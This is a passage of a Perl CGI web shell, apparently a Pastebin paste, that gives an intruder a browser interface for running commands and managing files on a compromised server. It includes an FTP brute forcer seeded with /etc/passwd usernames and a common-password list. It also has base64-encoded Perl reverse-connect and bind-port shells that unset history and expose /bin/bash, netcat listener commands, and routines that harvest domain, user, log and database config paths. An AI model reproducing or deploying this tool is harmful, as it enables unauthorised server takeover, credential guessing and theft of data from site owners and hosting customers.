  876.     my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
  877.     if(-w $File)
  878.     {
  879.         $rows="23"
  880.     }else
  881.     {
  882.         $msg="<br><font style='color: yellow;' > Cann't write file!<font><br>";
  883.         $rows="20"
  884.     }
  885.     $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
  886.     $RunCommand = "edit $RunCommand";
  887.     $result .=  <<END;
  888.     <form name="f" method="POST" action="$ScriptLocation">
  889.  
  890.     <input type="hidden" name="d" value="$EncodeCurrentDir">
  891.     $Prompt
  892.     <input type="text" size="40" name="c">
  893.     <input name="s" type="submit" value="Enter">
  894.     <br>Command: <run> $RunCommand </run>
  895.     <input type="hidden" name="file" value="$file" > $save <br> $msg
  896.     <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
  897. END
  898.  
  899.     $result .= &HtmlSpecialChars(&FileOpen($File,0));
  900.     $result .= "</textarea>";
  901.     $result .= "</form>";
  902.     return $result;
  903. }
  904. #==============================================================================
  905. # File Open
  906. #==============================================================================
  907. sub FileOpen($){
  908.     my $file = shift;
  909.     my $binary = shift;
  910.     my $result = "";
  911.     my $n = "";
  912.     if(-f $file){
  913.         if(open(FILE,$file)){
  914.             if($binary){
  915.                 binmode FILE;
  916.             }
  917.             while (($n = read FILE, $data, 1024) != 0) {
  918.                 $result .= $data;
  919.             }
  920.             close(FILE);
  921.         }
  922.     }else
  923.     {
  924.         return "Not's a File!";
  925.     }
  926.     return $result;
  927. }
  928. #==============================================================================
  929. # Save File
  930. #==============================================================================
  931. sub SaveFile($)
  932. {
  933.     my $Data= shift ;
  934.     my $File= shift;
  935.     $File=$CurrentDir.$PathSep.$File;
  936.     if(open(FILE, ">$File"))
  937.     {
  938.         binmode FILE;
  939.         print FILE $Data;
  940.         close FILE;
  941.         return 1;
  942.     }else
  943.     {
  944.         return 0;
  945.     }
  946. }
  947. #------------------------------------------------------------------------------
  948. # Brute Forcer Form
  949. #------------------------------------------------------------------------------
  950. sub BruteForcerForm
  951. {
  952.     my $result="";
  953.     $result .= <<END;
  954.  
  955. <table>
  956.  
  957. <tr>
  958. <td colspan="2" align="center">
  959. ####################################<br>
  960. Simple FTP brute forcer<br>
  961. Note: Only scan from 1 to 3 user :-S<br>
  962. ####################################
  963. <form name="f" method="POST" action="$ScriptLocation">
  964.  
  965. <input type="hidden" name="a" value="bruteforcer"/>
  966. </td>
  967. </tr>
  968. <tr>
  969. <td>User:<br><textarea rows="18" cols="30" name="user">
  970. END
  971. chop($result .= `less /etc/passwd | cut -d: -f1`);
  972. $result .= <<'END';
  973. </textarea></td>
  974. <td>
  975.  
  976. Pass:<br>
  977. <textarea rows="18" cols="30" name="pass">123pass
  978. 123!@#
  979. 123admin
  980. 123abc
  981. 123456admin
  982. 1234554321
  983. 12344321
  984. pass123
  985. admin
  986. admincp
  987. administrator
  988. matkhau
  989. passadmin
  990. p@ssword
  991. p@ssw0rd
  992. password
  993. 123456
  994. 1234567
  995. 12345678
  996. 123456789
  997. 1234567890
  998. 111111
  999. 000000
  1000. 222222
  1001. 333333
  1002. 444444
  1003. 555555
  1004. 666666
  1005. 777777
  1006. 888888
  1007. 999999
  1008. 123123
  1009. 234234
  1010. 345345
  1011. 456456
  1012. 567567
  1013. 678678
  1014. 789789
  1015. 123321
  1016. 456654
  1017. 654321
  1018. 7654321
  1019. 87654321
  1020. 987654321
  1021. 0987654321
  1022. admin123
  1023. admin123456
  1024. abcdef
  1025. abcabc
  1026. !@#!@#
  1027. !@#$%^
  1028. !@#$%^&*(
  1029. !@#$$#@!
  1030. abc123
  1031. anhyeuem
  1032. iloveyou</textarea>
  1033. </td>
  1034. </tr>
  1035. <tr>
  1036. <td colspan="2" align="center">
  1037. Sleep:<select name="sleep">
  1038.  
  1039. <option>0</option>
  1040. <option>1</option>
  1041. <option>2</option>
  1042.  
  1043. <option>3</option>
  1044. </select>
  1045. <input type="submit" value="Brute Forcer"/></td></tr>
  1046. </form>
  1047. </table>
  1048. END
  1049. return $result;
  1050. }
  1051. #------------------------------------------------------------------------------
  1052. # Brute Forcer
  1053. #------------------------------------------------------------------------------
  1054. sub BruteForcer
  1055. {
  1056.     my $result="";
  1057.     $Server=$ENV{'SERVER_ADDR'};
  1058.     if($in{'user'} eq "")
  1059.     {
  1060.         $result .= &BruteForcerForm;
  1061.     }else
  1062.     {
  1063.         use Net::FTP;
  1064.         @user= split(/\n/, $in{'user'});
  1065.         @pass= split(/\n/, $in{'pass'});
  1066.         chomp(@user);
  1067.         chomp(@pass);
  1068.         $result .= "<br><br>[+] Trying brute $ServerName<br>====================>>>>>>>>>>>><<<<<<<<<<====================<br><br>\n";
  1069.         foreach $username (@user)
  1070.         {
  1071.             if($username ne "")
  1072.             {
  1073.                 foreach $password (@pass)
  1074.                 {
  1075.                     $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n";
  1076.                     if($ftp->login("$username","$password"))
  1077.                     {
  1078.                         $result .= "<a target='_blank' href='ftp://$username:$password\@$Server'>[+] ftp://$username:$password\@$Server</a><br>\n";
  1079.                         $ftp->quit();
  1080.                         break;
  1081.                     }
  1082.                     if($in{'sleep'} ne "0")
  1083.                     {
  1084.                         sleep(int($in{'sleep'}) * 1000);
  1085.                     }
  1086.                     $ftp->quit();
  1087.                 }
  1088.             }
  1089.         }
  1090.         $result .= "\n<br>==========>>>>>>>>>> Finished <<<<<<<<<<==========<br>\n";
  1091.     }
  1092.     return $result;
  1093. }
  1094. #------------------------------------------------------------------------------
  1095. # Backconnect Form
  1096. #------------------------------------------------------------------------------
  1097. sub BackBindForm
  1098. {
  1099.     return <<END;
  1100.     <br><br>
  1101.  
  1102.     <table>
  1103.     <tr>
  1104.     <form name="f" method="POST" action="$ScriptLocation">
  1105.     <td>BackConnect: <input type="hidden" name="a" value="backbind"></td>
  1106.     <td> Host: <input type="text" size="20" name="clientaddr" value="$ENV{'REMOTE_ADDR'}">
  1107.      Port: <input type="text" size="6" name="clientport" value="80" onkeyup="document.getElementById('ba').innerHTML=this.value;"></td>
  1108.  
  1109.     <td><input name="s" type="submit" name="submit" value="Connect"></td>
  1110.     </form>
  1111.     </tr>
  1112.     <tr>
  1113.     <td colspan=3><font color=#FFFFFF>[+] Client listen before connect back!
  1114.     <br>[+] Try check your Port with <a target="_blank" href="http://www.canyouseeme.org/">http://www.canyouseeme.org/</a>
  1115.     <br>[+] Client listen with command: <run>nc -vv -l -p <span id="ba">80</span></run></font></td>
  1116.  
  1117.     </tr>
  1118.     </table>
  1119.  
  1120.     <br><br>
  1121.     <table>
  1122.     <tr>
  1123.     <form method="POST" action="$ScriptLocation">
  1124.     <td>Bind Port: <input type="hidden" name="a" value="backbind"></td>
  1125.  
  1126.     <td> Port: <input type="text" size="15" name="clientport" value="1412" onkeyup="document.getElementById('bi').innerHTML=this.value;">
  1127.  
  1128.      Password: <input type="text" size="12" name="bindpass" value="vinakid"></td>
  1129.     <td><input name="s" type="submit" name="submit" value="Bind"></td>
  1130.     </form>
  1131.     </tr>
  1132.     <tr>
  1133.     <td colspan=3><font color=#FFFFFF>[+] Testing ....
  1134.     <br>[+] Try command: <run>nc $ENV{'SERVER_ADDR'} <span id="bi">1412</span></run></font></td>
  1135.  
  1136.     </tr>
  1137.     </table><br>
  1138. END
  1139. }
  1140. #------------------------------------------------------------------------------
  1141. # Backconnect use perl
  1142. #------------------------------------------------------------------------------
  1143. sub BackBind
  1144. {
  1145.     use Socket;
  1146.     $backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7";
  1147.     $bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo=";
  1148.  
  1149.     $ClientAddr = $in{'clientaddr'};
  1150.     $ClientPort = int($in{'clientport'});
  1151.     if($ClientPort eq 0)
  1152.     {
  1153.         return &BackBindForm;
  1154.     }elsif(!$ClientAddr eq "")
  1155.     {
  1156.         $Data=decode_base64($backperl);
  1157.         if(-w "/tmp/")
  1158.         {
  1159.             $File="/tmp/backconnect.pl";   
  1160.         }else
  1161.         {
  1162.             $File=$CurrentDir.$PathSep."backconnect.pl";
  1163.         }
  1164.         open(FILE, ">$File");
  1165.         print FILE $Data;
  1166.         close FILE;
  1167.         system("perl $File $ClientAddr $ClientPort");
  1168.         unlink($File);
  1169.         exit 0;
  1170.     }else
  1171.     {
  1172.         $Data=decode_base64($bindperl);
  1173.         if(-w "/tmp")
  1174.         {
  1175.             $File="/tmp/bindport.pl";  
  1176.         }else
  1177.         {
  1178.             $File=$CurrentDir.$PathSep."bindport.pl";
  1179.         }
  1180.         open(FILE, ">$File");
  1181.         print FILE $Data;
  1182.         close FILE;
  1183.         system("perl $File $ClientPort");
  1184.         unlink($File);
  1185.         exit 0;
  1186.     }
  1187. }
  1188. #------------------------------------------------------------------------------
  1189. #  Array List Directory
  1190. #------------------------------------------------------------------------------
  1191. sub RmDir($)
  1192. {
  1193.     my $dir = shift;
  1194.     if(opendir(DIR,$dir))
  1195.     {
  1196.         while($file = readdir(DIR))
  1197.         {
  1198.             if(($file ne ".") && ($file ne ".."))
  1199.             {
  1200.                 $file= $dir.$PathSep.$file;
  1201.                 if(-d $file)
  1202.                 {
  1203.                     &RmDir($file);
  1204.                 }
  1205.                 else
  1206.                 {
  1207.                     unlink($file);
  1208.                 }
  1209.             }
  1210.         }
  1211.         closedir(DIR);
  1212.     }
  1213. }
  1214. sub FileOwner($)
  1215. {
  1216.     my $file = shift;
  1217.     if(-e $file)
  1218.     {
  1219.         ($uid,$gid) = (stat($file))[4,5];
  1220.         if($WinNT)
  1221.         {
  1222.             return "???";
  1223.         }
  1224.         else
  1225.         {
  1226.             $name=getpwuid($uid);
  1227.             $group=getgrgid($gid);
  1228.             return $name."/".$group;
  1229.         }
  1230.     }
  1231.     return "???";
  1232. }
  1233. sub ParentFolder($)
  1234. {
  1235.     my $path = shift;
  1236.     my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd;
  1237.     chop($path = `$Comm`);
  1238.     return $path;
  1239. }
  1240. sub FilePerms($)
  1241. {
  1242.     my $file = shift;
  1243.     my $ur = "-";
  1244.     my $uw = "-";
  1245.     if(-e $file)
  1246.     {
  1247.         if($WinNT)
  1248.         {
  1249.             if(-r $file){ $ur = "r"; }
  1250.             if(-w $file){ $uw = "w"; }
  1251.             return $ur . " / " . $uw;
  1252.         }else
  1253.         {
  1254.             $mode=(stat($file))[2];
  1255.             $result = sprintf("%04o", $mode & 07777);
  1256.             return $result;
  1257.         }
  1258.     }
  1259.     return "0000";
  1260. }
  1261. sub FileLastModified($)
  1262. {
  1263.     my $file = shift;
  1264.     if(-e $file)
  1265.     {
  1266.         ($la) = (stat($file))[9];
  1267.         ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1];
  1268.         $y = $y + 1900;
  1269.         @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/;
  1270.         $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i);
  1271.         return $lmtime;
  1272.     }
  1273.     return "???";
  1274. }
  1275. sub FileSize($)
  1276. {
  1277.     my $file = shift;
  1278.     if(-f $file)
  1279.     {
  1280.         return -s "$file";
  1281.     }
  1282.     return "0";
  1283. }
  1284. sub ParseFileSize($)
  1285. {
  1286.     my $size = shift;
  1287.     if($size <= 1024)
  1288.     {
  1289.         return $size. " B";
  1290.     }
  1291.     else
  1292.     {
  1293.         if($size <= 1024*1024)
  1294.         {
  1295.             $size = sprintf("%.02f",$size / 1024);
  1296.             return $size." KB";
  1297.         }
  1298.         else
  1299.         {
  1300.             $size = sprintf("%.2f",$size / 1024 / 1024);
  1301.             return $size." MB";
  1302.         }
  1303.     }
  1304. }
  1305. sub trim($)
  1306. {
  1307.     my $string = shift;
  1308.     $string =~ s/^\s+//;
  1309.     $string =~ s/\s+$//;
  1310.     return $string;
  1311. }
  1312. sub AddSlashes($)
  1313. {
  1314.     my $string = shift;
  1315.     $string=~ s/\\/\\\\/g;
  1316.     return $string;
  1317. }
  1318. sub TrimSlashes($)
  1319. {
  1320.     my $string = shift;
  1321.     $string=~ s/\/\//\//g;
  1322.     $string=~ s/\\\\/\\/g;
  1323.     return $string;
  1324. }
  1325. sub ListDir
  1326. {
  1327.     my $path = &TrimSlashes($CurrentDir.$PathSep);
  1328.     my $result = "<form name='f' onSubmit=\"Encoder('d')\" action='$ScriptLocation'><span style='font: 11pt Verdana; font-weight: bold;'>Path: [ ".&AddLinkDir("gui")." ] </span><input type='text' id='d' name='d' size='40' value='$CurrentDir' /><input type='hidden' name='a' value='gui'><input class='submit' type='submit' value='Change'></form>";
  1329.     if(-d $path)
  1330.     {
  1331.         my @fname = ();
  1332.         my @dname = ();
  1333.         if(opendir(DIR,$path))
  1334.         {
  1335.             while($file = readdir(DIR))
  1336.             {
  1337.                 $f=$path.$file;
  1338.                 if(-d $f)
  1339.                 {
  1340.                     push(@dname,$file);
  1341.                 }
  1342.                 else
  1343.                 {
  1344.                     push(@fname,$file);
  1345.                 }
  1346.             }
  1347.             closedir(DIR);
  1348.         }
  1349.         @fname = sort { lc($a) cmp lc($b) } @fname;
  1350.         @dname = sort { lc($a) cmp lc($b) } @dname;
  1351.         $result .= "<div><table width='90%' class='listdir'>
  1352.         <tr style='background-color: #3e3e3e'><th>File Name</th>
  1353.         <th width='100'>File Size</th>
  1354.         <th width='150'>Owner</th>
  1355.         <th width='100'>Permission</th>
  1356.         <th width='150'>Last Modified</th>
  1357.         <th width='230'>Action</th></tr>";
  1358.         my $style="notline";
  1359.         my $i=0;
  1360.         foreach my $d (@dname)
  1361.         {
  1362.             $style= ($style eq "line") ? "notline": "line";
  1363.             $d = &trim($d);
  1364.             $dirname=$d;
  1365.             if($d eq "..")
  1366.             {
  1367.                 $d = &ParentFolder($path);
  1368.             }
  1369.             elsif($d eq ".")
  1370.             {
  1371.                 next;
  1372.             }
  1373.             else
  1374.             {
  1375.                 $d = $path.$d;
  1376.             }
  1377.             $result .= "<tr class='$style'><td id='File_$i' class='dir'><a  href='?a=gui&d=".&EncodeDir($d)."'>[ ".$dirname." ]</a></td>";
  1378.             $result .= "<td>DIR</td>";
  1379.             $result .= "<td>".&FileOwner($d)."</td>";
  1380.             $result .= "<td id='FilePerms_$i' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($d)."','".$dirname."')\" ><span onclick=\"chmod_form(".$i.",'".$dirname."')\" >".&FilePerms($d)."</span></td>";
  1381.             $result .= "<td>".&FileLastModified($d)."</td>";
  1382.             $result .= "<td><a onclick=\"rename_form($i,'$dirname','".&AddSlashes(&AddSlashes($d))."'); return false; \">Rename</a>  | <a onclick=\"if(!confirm('Remove dir: $dirname ?')) { return false;}\" href='?a=gui&d=".&EncodeDir($path)."&remove=$dirname'>Remove</a></td>";
  1383.             $result .= "</tr>";
  1384.             $i++;
  1385.         }
  1386.         foreach my $f (@fname)
  1387.         {
  1388.             $style= ($style eq "line") ? "notline": "line";
  1389.             $file=$f;
  1390.             $f = $path.$f;
  1391.             my $action = encode_base64("edit ".$file);
  1392.             $view = "?dir=".$path."&view=".$f;
  1393.             $result .= "<tr class='$style'><td id='File_$i' class='file'><a href='?a=command&d=".&EncodeDir($path)."&c=".$action."'>".$file."</a></td>";
  1394.             $result .= "<td>".&ParseFileSize(&FileSize($f))."</td>";
  1395.             $result .= "<td>".&FileOwner($f)."</td>";
  1396.             $result .= "<td id='FilePerms_$i' ondblclick=\"rm_chmod_form(this,".$i.",'".&FilePerms($f)."','".$file."')\" ><span onclick=\"chmod_form($i,'$file')\" >".&FilePerms($f)."</span></td>";
  1397.             $result .= "<td>".&FileLastModified($f)."</td>";
  1398.             $result .= "<td><a onclick=\"rename_form($i,'$file','f'); return false;\">Rename</a> | <a href='?a=download&o=go&f=".$f."'>Download</a> | <a onclick=\"if(!confirm('Remove file: $file ?')) { return false;}\" href='?a=gui&d=".&EncodeDir($path)."&remove=$file'>Remove</a></td>";
  1399.             $result .= "</tr>";
  1400.             $i++;
  1401.         }
  1402.         $result .= "</table></div>";
  1403.     }
  1404.     return $result;
  1405. }
  1406. #------------------------------------------------------------------------------
  1407. # Try to View List User
  1408. #------------------------------------------------------------------------------
  1409. sub ViewDomainUser
  1410. {
  1411.     open (d0mains, '/etc/named.conf') or $err=1;
  1412.     my @cnzs = <d0mains>;
  1413.     close d0mains;
  1414.     my $style="line";
  1415.     my $result="<h3><font style='font: 15pt Verdana;color: #ff9900;'>Domain + User</font></h3>";
  1416.     if ($err)
  1417.     {
  1418.         $result .=  ('<p>C0uldn\'t Bypass it , Sorry</p>');
  1419.         return $result;
  1420.     }else
  1421.     {
  1422.         $result .= '<table id="domain"><tr><th>d0mains</th> <th>User</th></tr>';
  1423.     }
  1424.     foreach my $one (@cnzs)
  1425.     {
  1426.         if($one =~ m/.*?zone "(.*?)" {/)
  1427.         {  
  1428.             $style= ($style eq "line") ? "notline": "line";
  1429.             $filename= trim("/etc/valiases/".$1);
  1430.             $owner = getpwuid((stat($filename))[4]);
  1431.             $result .= '<tr style="$style" width=50%><td><a href="http://'.$1.'" target="_blank">'.$1.'</a></td><td> '.$owner.'</td></tr>';
  1432.         }
  1433.     }
  1434.     $result .= '</table>';
  1435.     return $result;
  1436. }
  1437. #------------------------------------------------------------------------------
  1438. # View Log
  1439. #------------------------------------------------------------------------------
  1440. sub ViewLog
  1441. {
  1442.     $EncodeCurrentDir = EncodeDir($CurrentDir);
  1443.     if($WinNT)
  1444.     {
  1445.         return "<h2><font style='font: 20pt Verdana;color: #ff9900;'>Don't run on Windows</font></h2>";
  1446.     }
  1447.     my $result="<table><tr><th>Path Log</th><th>Submit</th></tr>";
  1448.     my @pathlog=(   '/usr/local/apache/logs/error_log',
  1449.             '/usr/local/apache/logs/access_log',
  1450.             '/usr/local/apache2/conf/httpd.conf',
  1451.             '/var/log/httpd/error_log',
  1452.             '/var/log/httpd/access_log',
  1453.             '/usr/local/cpanel/logs/error_log',
  1454.             '/usr/local/cpanel/logs/access_log',
  1455.             '/usr/local/apache/logs/suphp_log',
  1456.             '/usr/local/cpanel/logs',
  1457.             '/usr/local/cpanel/logs/stats_log',
  1458.             '/usr/local/cpanel/logs/access_log',
  1459.             '/usr/local/cpanel/logs/error_log',
  1460.             '/usr/local/cpanel/logs/license_log',
  1461.             '/usr/local/cpanel/logs/login_log',
  1462.             '/usr/local/cpanel/logs/stats_log',
  1463.             '/var/cpanel/cpanel.config',
  1464.             '/usr/local/php/lib/php.ini',
  1465.             '/usr/local/php5/lib/php.ini',
  1466.             '/var/log/mysql/mysql-bin.log',
  1467.             '/var/log/mysql.log',
  1468.             '/var/log/mysqlderror.log',
  1469.             '/var/log/mysql/mysql.log',
  1470.             '/var/log/mysql/mysql-slow.log',
  1471.             '/var/mysql.log',
  1472.             '/var/lib/mysql/my.cnf',
  1473.             '/etc/mysql/my.cnf',
  1474.             '/etc/my.cnf',
  1475.             );
  1476.     my $i=0;
  1477.     my $perms;
  1478.     my $sl;
  1479.     foreach my $log (@pathlog)
  1480.     {
  1481.         if(-r $log)
  1482.         {
  1483.             $perms="OK";
  1484.         }else
  1485.         {
  1486.             $perms="<font style='color: red;'>Cancel<font>";
  1487.         }
  1488.         $result .=<<END;
  1489.         <tr>
  1490.  
  1491.             <form action="" method="post" onSubmit="Encoder('log$i')">
  1492.             <td><input type="text" id="log$i" name="c" value="tail -10000 $log | grep '/home'" size='50'/></td>
  1493.             <td><input type="submit" value="Try" /></td>
  1494.             <input type="hidden" name="a" value="command" />
  1495.             <input type="hidden" name="d" value="$EncodeCurrentDir" />
  1496.             </form>
  1497.             <td>$perms</td>
  1498.  
  1499.         </tr>
  1500. END
  1501.         $i++;
  1502.     }
  1503.     $result .="</table>";
  1504.     return $result;
  1505. }
  1506. #------------------------------------------------------------------------------
  1507. # Main Program - Execution Starts Here
  1508. #------------------------------------------------------------------------------
  1509. &ReadParse;
  1510. &GetCookies;
  1511.  
  1512. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  1513. $ServerName = $ENV{'SERVER_NAME'};
  1514. $LoginPassword = $in{'p'};
  1515. $RunCommand = decode_base64($in{'c'});
  1516. $TransferFile = $in{'f'};
  1517. $Options = $in{'o'};
  1518. $Action = $in{'a'};
  1519.  
  1520. $Action = "command" if($Action eq ""); # no action specified, use default
  1521.  
  1522. # get the directory in which the commands will be executed
  1523. $CurrentDir = &TrimSlashes(decode_base64(trim($in{'d'})));
  1524. # mac dinh xuat thong tin neu ko co lenh nao!
  1525. $RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq "");
  1526. chomp($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  1527.  
  1528. $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
  1529.  
  1530. if($Action eq "login" || !$LoggedIn)        # user needs/has to login
  1531. {
  1532.     &PerformLogin;
  1533. }elsif($Action eq "gui") # GUI directory
  1534. {
  1535.     &PrintPageHeader("d");
  1536.     if(!$WinNT)
  1537.     {
  1538.         $chmod=int($in{'chmod'});
  1539.         if($chmod ne 0)
  1540.         {
  1541.             $chmod=int($in{'chmod'});
  1542.             $file=$CurrentDir.$PathSep.$TransferFile;
  1543.             if(chmod($chmod,$file))
  1544.             {
  1545.                 print "<run> Done! </run><br>";
  1546.             }else
  1547.             {
  1548.                 print "<run> Sorry! You dont have permissions! </run><br>";
  1549.             }
  1550.         }
  1551.     }
  1552.     $rename=$in{'rename'};
  1553.     if($rename ne "")
  1554.     {
  1555.         if(rename($TransferFile,$rename))
  1556.         {
  1557.             print "<run> Done! </run><br>";
  1558.         }else
  1559.         {
  1560.             print "<run> Sorry! You dont have permissions! </run><br>";
  1561.         }
  1562.     }
  1563.     $remove=$in{'remove'};
  1564.     if($remove ne "")
  1565.     {
  1566.         $rm = $CurrentDir.$PathSep.$remove;
  1567.         if(-d $rm)
  1568.         {
  1569.             &RmDir($rm);
  1570.         }else
  1571.         {
  1572.             if(unlink($rm))
  1573.             {
  1574.                 print "<run> Done! </run><br>";
  1575.             }else
  1576.             {
  1577.                 print "<run> Sorry! You dont have permissions! </run><br>";
  1578.             }          
  1579.         }
  1580.     }
  1581.     print &ListDir;
  1582.  
  1583. }
  1584. elsif($Action eq "command")                 # user wants to run a command
  1585. {
  1586.     &PrintPageHeader("c");
  1587.     print &ExecuteCommand;
  1588. }
  1589. elsif($Action eq "save")                    # user wants to save a file
  1590. {
  1591.     &PrintPageHeader;
  1592.     if(&SaveFile($in{'data'},$in{'file'}))
  1593.     {
  1594.         print "<run> Done! </run><br>";
  1595.     }else
  1596.     {
  1597.         print "<run> Sorry! You dont have permissions! </run><br>";
  1598.     }
  1599.     print &ListDir;
  1600. }elsif($Action eq "upload")                     # user wants to upload a file
  1601. {
  1602.     &PrintPageHeader("c");
  1603.     print &UploadFile;
  1604. }elsif($Action eq "backbind")               # user wants to back connect or bind port
  1605. {
  1606.     &PrintPageHeader("clientport");
  1607.     print &BackBind;
  1608. }elsif($Action eq "bruteforcer")            # user wants to brute force
  1609. {
  1610.     &PrintPageHeader;
  1611.     print &BruteForcer;
  1612. }elsif($Action eq "download")               # user wants to download a file
  1613. {
  1614.     print &DownloadFile;
  1615. }elsif($Action eq "checklog")               # user wants to view log file
  1616. {
  1617.     &PrintPageHeader;
  1618.     print &ViewLog;
  1619.  
  1620. }elsif($Action eq "domainsuser")            # user wants to view list user/domain
  1621. {
  1622.     &PrintPageHeader;
  1623.     print &ViewDomainUser;
  1624. }elsif($Action eq "logout")                 # user wants to logout
  1625. {
  1626.     &PerformLogout;
  1627. }
  1628. &PrintPageFooter;
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top